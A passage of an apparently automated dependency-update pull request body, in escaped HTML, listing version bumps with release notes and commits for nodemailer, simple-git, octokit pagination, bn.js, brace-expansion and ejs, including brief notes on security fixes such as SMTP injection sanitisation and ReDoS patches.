href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.2...v8.0.3\"\u003e8.0.3\u003c/a\u003e (2026-03-18)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eclean up addressparser and fix group name fallback producing undefined (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/9d55877f8ed15a6aefd7ba76cbb6b6a6cdbcc4fd\"\u003e9d55877\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix cookie bugs, remove dead code, and improve hot-path efficiency (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/e8c8b92f46f2a82d06d49cc9a6ffc26067f68524\"\u003ee8c8b92\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erefactor smtp-connection for clarity and add Node.js 6 syntax compat test (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/c5b48ea61c28eabf347972f4198a12cdab226ff7\"\u003ec5b48ea\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove familySupportCache that broke DNS resolution tests (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/c803d901f195a21edbb2c276b2e116564467aaaa\"\u003ec803d90\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev8.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.1...v8.0.2\"\u003e8.0.2\u003c/a\u003e (2026-03-09)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003emerge fragmented display names with unquoted commas in addressparser (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/fe27f7fd57f7587d897274438da2f628ad0ad7d9\"\u003efe27f7f\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodemailer/nodemailer/blob/master/CHANGELOG.md\"\u003enodemailer's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.3...v8.0.4\"\u003e8.0.4\u003c/a\u003e (2026-03-25)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003esanitize envelope size to prevent SMTP command injection (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/2d7b9710e63555a1eb13d721296c51186d4b5651\"\u003e2d7b971\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.2...v8.0.3\"\u003e8.0.3\u003c/a\u003e (2026-03-18)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eclean up addressparser and fix group name fallback producing undefined (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/9d55877f8ed15a6aefd7ba76cbb6b6a6cdbcc4fd\"\u003e9d55877\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix cookie bugs, remove dead code, and improve hot-path efficiency (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/e8c8b92f46f2a82d06d49cc9a6ffc26067f68524\"\u003ee8c8b92\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erefactor smtp-connection for clarity and add Node.js 6 syntax compat test (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/c5b48ea61c28eabf347972f4198a12cdab226ff7\"\u003ec5b48ea\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove familySupportCache that broke DNS resolution tests (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/c803d901f195a21edbb2c276b2e116564467aaaa\"\u003ec803d90\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.1...v8.0.2\"\u003e8.0.2\u003c/a\u003e (2026-03-09)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003emerge fragmented display names with unquoted commas in addressparser (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/fe27f7fd57f7587d897274438da2f628ad0ad7d9\"\u003efe27f7f\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/2d319753c34d2f0ced24d8eb1d7d866d965f59f4\"\u003e\u003ccode\u003e2d31975\u003c/code\u003e\u003c/a\u003e chore(master): release 8.0.4 (\u003ca href=\"https://redirect.github.com/nodemailer/nodemailer/issues/1806\"\u003e#1806\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/2d7b9710e63555a1eb13d721296c51186d4b5651\"\u003e\u003ccode\u003e2d7b971\u003c/code\u003e\u003c/a\u003e fix: sanitize envelope size to prevent SMTP command injection\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/4e702e97650aaff442a7bc040957ba9c53c614b8\"\u003e\u003ccode\u003e4e702e9\u003c/code\u003e\u003c/a\u003e chore(master): release 8.0.3 (\u003ca href=\"https://redirect.github.com/nodemailer/nodemailer/issues/1804\"\u003e#1804\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/c803d901f195a21edbb2c276b2e116564467aaaa\"\u003e\u003ccode\u003ec803d90\u003c/code\u003e\u003c/a\u003e fix: remove familySupportCache that broke DNS resolution tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/e8c8b92f46f2a82d06d49cc9a6ffc26067f68524\"\u003e\u003ccode\u003ee8c8b92\u003c/code\u003e\u003c/a\u003e fix: fix cookie bugs, remove dead code, and improve hot-path efficiency\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/0e78ee142b83cd967b5c451bb929f11dd4098f8e\"\u003e\u003ccode\u003e0e78ee1\u003c/code\u003e\u003c/a\u003e chore: update dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/af73b4cd165d92271576e27b3678eb028bab5f44\"\u003e\u003ccode\u003eaf73b4c\u003c/code\u003e\u003c/a\u003e chore: upgrade GitHub Actions to latest versions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/604b5702e463ed85828de57402b8332a371f838c\"\u003e\u003ccode\u003e604b570\u003c/code\u003e\u003c/a\u003e chore: simplify remaining lib modules for clarity and consistency\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/4ced83d5ce5c61865783d8fb672f98447b52b739\"\u003e\u003ccode\u003e4ced83d\u003c/code\u003e\u003c/a\u003e chore: simplify shared, errors, mailer, mime-node, and mime-funcs modules\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/0cba16e16509d6d2af0899dbb2420e587172f233\"\u003e\u003ccode\u003e0cba16e\u003c/code\u003e\u003c/a\u003e chore: simplify smtp-pool with const, Object.assign, and cleaner control flow\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.1...v8.0.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `simple-git` from 3.21.0 to 3.32.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/steveukx/git-js/releases\"\u003esimple-git's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003esimple-git@3.32.3\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003ef704208: Enhanced \u003ccode\u003eprotocol.allow\u003c/code\u003e checks in \u003ccode\u003eallowUnsafeExtProtocol\u003c/code\u003e handling.\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/CodeAnt-AI-Security\"\u003e\u003ccode\u003e@​CodeAnt-AI-Security\u003c/code\u003e\u003c/a\u003e for identifying the issue\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.32.2\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e8d02097: Enhanced clone unsafe switch detection.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.32.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e23b070f: Fix regex for detecting unsafe clone options\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/stevenwdv\"\u003e\u003ccode\u003e@​stevenwdv\u003c/code\u003e\u003c/a\u003e for reporting this issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.32.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e1effd8e: Enhances the \u003ccode\u003eunsafe\u003c/code\u003e plugin to block additional cases where the \u003ccode\u003e-u\u003c/code\u003e switch may be disguised\nalong with other single character options.\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/JuHwiSang\"\u003e\u003ccode\u003e@​JuHwiSang\u003c/code\u003e\u003c/a\u003e for identifying this as vulnerability.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ed5fd4fe: Use task runner for logging use of deprecated (already no-op) functions.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.31.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ea44184f: Resolve NPM publish steps\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.30.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003ebc77774: Correctly identify current branch name when using \u003ccode\u003egit.status\u003c/code\u003e in a cloned empty repo.\u003c/p\u003e\n\u003cp\u003ePreviously \u003ccode\u003egit.status\u003c/code\u003e would report the current branch name as \u003ccode\u003eNo\u003c/code\u003e. Thank you to \u003ca href=\"https://github.com/MaddyGuthridge\"\u003e\u003ccode\u003e@​MaddyGuthridge\u003c/code\u003e\u003c/a\u003e for identifying this issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.28.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e2adf47d: Allow repeating git options like \u003ccode\u003e{'--opt': ['value1', 'value2']}\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.27.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/steveukx/git-js/blob/main/simple-git/CHANGELOG.md\"\u003esimple-git's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.32.3\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003ef704208: Enhanced \u003ccode\u003eprotocol.allow\u003c/code\u003e checks in \u003ccode\u003eallowUnsafeExtProtocol\u003c/code\u003e handling.\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/CodeAnt-AI-Security\"\u003e\u003ccode\u003e@​CodeAnt-AI-Security\u003c/code\u003e\u003c/a\u003e for identifying the issue\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.32.2\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e8d02097: Enhanced clone unsafe switch detection.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.32.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e23b070f: Fix regex for detecting unsafe clone options\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/stevenwdv\"\u003e\u003ccode\u003e@​stevenwdv\u003c/code\u003e\u003c/a\u003e for reporting this issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.32.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e1effd8e: Enhances the \u003ccode\u003eunsafe\u003c/code\u003e plugin to block additional cases where the \u003ccode\u003e-u\u003c/code\u003e switch may be disguised\nalong with other single character options.\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/JuHwiSang\"\u003e\u003ccode\u003e@​JuHwiSang\u003c/code\u003e\u003c/a\u003e for identifying this as vulnerability.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ed5fd4fe: Use task runner for logging use of deprecated (already no-op) functions.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.31.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ea44184f: Resolve NPM publish steps\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.31.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e22dc93f: Custom binary plugin should support the use of \u003ccode\u003e~\u003c/code\u003e character, used by Windows to shorten long folder names\nand folder names that have spaces in them (eg: \u003ccode\u003eC:\\Program Files\u003c/code\u003e might become \u003ccode\u003eC:\\PROGRA~1\u003c/code\u003e).\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/skyshineb\"\u003e\u003ccode\u003e@​skyshineb\u003c/code\u003e\u003c/a\u003e for reporting this issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/a1170e506eeeaade4a242bfbf6d0620d57872364\"\u003e\u003ccode\u003ea1170e5\u003c/code\u003e\u003c/a\u003e Version Packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/f7042088aa2dac59e3c49a84d7a2f4b26048a257\"\u003e\u003ccode\u003ef704208\u003c/code\u003e\u003c/a\u003e In extension to CVE-2022-25912, switch to case-insensitive check for `protoco...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/4bb20811eb35c0fa5437553cad4eb8ebf8f6f6e6\"\u003e\u003ccode\u003e4bb2081\u003c/code\u003e\u003c/a\u003e Version Packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/7ae7537737bafc1e6559a28816785b10926fb095\"\u003e\u003ccode\u003e7ae7537\u003c/code\u003e\u003c/a\u003e Match tokens to word boundary\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/c47ad103b07ce768cf69aec63e0c9f7f77a1ab0f\"\u003e\u003ccode\u003ec47ad10\u003c/code\u003e\u003c/a\u003e Lint\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/8d02097b726c2bc5360b4f55ee3ecb7e09648e4d\"\u003e\u003ccode\u003e8d02097\u003c/code\u003e\u003c/a\u003e Enhanced clone switch detection\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/f6909a52807512cb4e29a654db2dcd409b019113\"\u003e\u003ccode\u003ef6909a5\u003c/code\u003e\u003c/a\u003e Remove test timeout override\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/77406267ceb19aa901495b6ae414020daf789ebf\"\u003e\u003ccode\u003e7740626\u003c/code\u003e\u003c/a\u003e Update plugin.unsafe.spec.ts\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/b562a6c4c1a226d9c7789b72c76784f334c1efac\"\u003e\u003ccode\u003eb562a6c\u003c/code\u003e\u003c/a\u003e Version Packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/23b070f0a4d320af5e745a42ae6176a629409566\"\u003e\u003ccode\u003e23b070f\u003c/code\u003e\u003c/a\u003e Fix regex for CLONE_OPTIONS constant (\u003ca href=\"https://github.com/steveukx/git-js/tree/HEAD/simple-git/issues/1122\"\u003e#1122\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/steveukx/git-js/commits/simple-git@3.32.3/simple-git\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for simple-git since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/plugin-paginate-rest` from 9.2.1 to 9.2.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/releases\"\u003e\u003ccode\u003e@​octokit/plugin-paginate-rest\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev9.2.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.2.1...v9.2.2\"\u003e9.2.2\u003c/a\u003e (2025-02-15)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/660\"\u003e#660\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/e1e44898cf1870f1496ae7f5b2a4476c71044e6b\"\u003ee1e4489\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/e1e44898cf1870f1496ae7f5b2a4476c71044e6b\"\u003e\u003ccode\u003ee1e4489\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/660\"\u003e#660\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.2.1...v9.2.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `bn.js` from 4.12.0 to 4.12.3\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/39fe4389c773327ed15f29f77f8b7dbbff4beb4c\"\u003e\u003ccode\u003e39fe438\u003c/code\u003e\u003c/a\u003e 4.12.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/67ecb35dabaf252001b649c12d69c4b57deac6f6\"\u003e\u003ccode\u003e67ecb35\u003c/code\u003e\u003c/a\u003e backport(4.x): fix imaskn state (\u003ca href=\"https://redirect.github.com/indutny/bn.js/issues/317\"\u003e#317\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/c4098bac2470418f8e0f6bf11fe0cb676a2b9047\"\u003e\u003ccode\u003ec4098ba\u003c/code\u003e\u003c/a\u003e 4.12.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/6277fd705e51edae1c404c65f03ba2e512706945\"\u003e\u003ccode\u003e6277fd7\u003c/code\u003e\u003c/a\u003e backport(4.x): Fix imuln/muln with zero (backport of \u003ca href=\"https://redirect.github.com/indutny/bn.js/issues/313\"\u003e#313\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/indutny/bn.js/issues/314\"\u003e#314\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/ac0d4afaae91701815b9edc19789e44e7690d688\"\u003e\u003ccode\u003eac0d4af\u003c/code\u003e\u003c/a\u003e 4.12.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/a5f14b43ec61bc7cafc6de2e7444913b9f581b00\"\u003e\u003ccode\u003ea5f14b4\u003c/code\u003e\u003c/a\u003e Fix serious issue in \u003ccode\u003e.toString(16)\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/indutny/bn.js/issues/309\"\u003e#309\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/0cd2661b9d08512263c940662586042ef8aaccc6\"\u003e\u003ccode\u003e0cd2661\u003c/code\u003e\u003c/a\u003e Remove package-lock.json added by npm\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/indutny/bn.js/compare/v4.12.0...v4.12.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `brace-expansion` from 1.1.11 to 1.1.13\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/juliangruber/brace-expansion/releases\"\u003ebrace-expansion's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.1.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003epkg: publish on tag 1.x  c460dbd\u003c/li\u003e\n\u003cli\u003efmt  ccb8ac6\u003c/li\u003e\n\u003cli\u003eFix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)  c3c73c8\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\"\u003ehttps://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/6c353caf23beb9644f858eb3fe38d43a68b82898\"\u003e\u003ccode\u003e6c353ca\u003c/code\u003e\u003c/a\u003e 1.1.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2\"\u003e\u003ccode\u003e7fd684f\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-f886-m6hf-6m8v (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/95\"\u003e#95\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/44f33b47c5c6a965d507421af43e86cf5971d711\"\u003e\u003ccode\u003e44f33b4\u003c/code\u003e\u003c/a\u003e 1.1.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c460dbd68e428d147b2080622d8ce126c7a08570\"\u003e\u003ccode\u003ec460dbd\u003c/code\u003e\u003c/a\u003e pkg: publish on tag 1.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/ccb8ac6d4292b7661b677fe048ba6690c877f51f\"\u003e\u003ccode\u003eccb8ac6\u003c/code\u003e\u003c/a\u003e fmt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c3c73c8b088defc70851843be88ccc3af08e7217\"\u003e\u003ccode\u003ec3c73c8\u003c/code\u003e\u003c/a\u003e Fix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/1.1.11...v1.1.13\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ejs` from 3.1.9 to 3.1.10\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/mde/ejs/releases\"\u003eejs's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.1.10\u003c/h2\u003e\n\u003cp\u003eVersion 3.1.10\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/d3f807dea9ce904e20a47a661f2310ce9134dc2a\"\u003e\u003ccode\u003ed3f807d\u003c/code\u003e\u003c/a\u003e Version 3.1.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/9ee26dde5d7015d9c0e2ff87314cabeac5247c02\"\u003e\u003ccode\u003e9ee26dd\u003c/code\u003e\u003c/a\u003e Mocha TDD\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/e469741dca7df2eb400199e1cdb74621e3f89aa5\"\u003e\u003ccode\u003ee469741\u003c/code\u003e\u003c/a\u003e Basic pollution protection\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/715e9507fa3e6122dc6430fe0f25a6e6ded300c1\"\u003e\u003ccode\u003e715e950\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/mde/ejs/issues/756\"\u003e#756\u003c/a\u003e from Jeffrey-mu/main\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/cabe3146ad964a1e98db7742abf435906ca79406\"\u003e\u003ccode\u003ecabe314\u003c/code\u003e\u003c/a\u003e Include advanced usage examples\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/29b076cdbbf3eb1b4323b33299ab6d79391b2c33\"\u003e\u003ccode\u003e29b076c\u003c/code\u003e\u003c/a\u003e Added header\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/11503c79af882e3635b513d57c7f1813792eb127\"\u003e\u003ccode\u003e11503c7\u003c/code\u003e\u003c/a\u003e Merge branch 'main' of github.com:mde/ejs into main\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/7690404e2fc1688756938e4d2fc19e0fac77d736\"\u003e\u003ccode\u003e7690404\u003c/code\u003e\u003c/a\u003e Added security banner to README\u003c/li\u003e\n\u003cli\u003e\u003ca 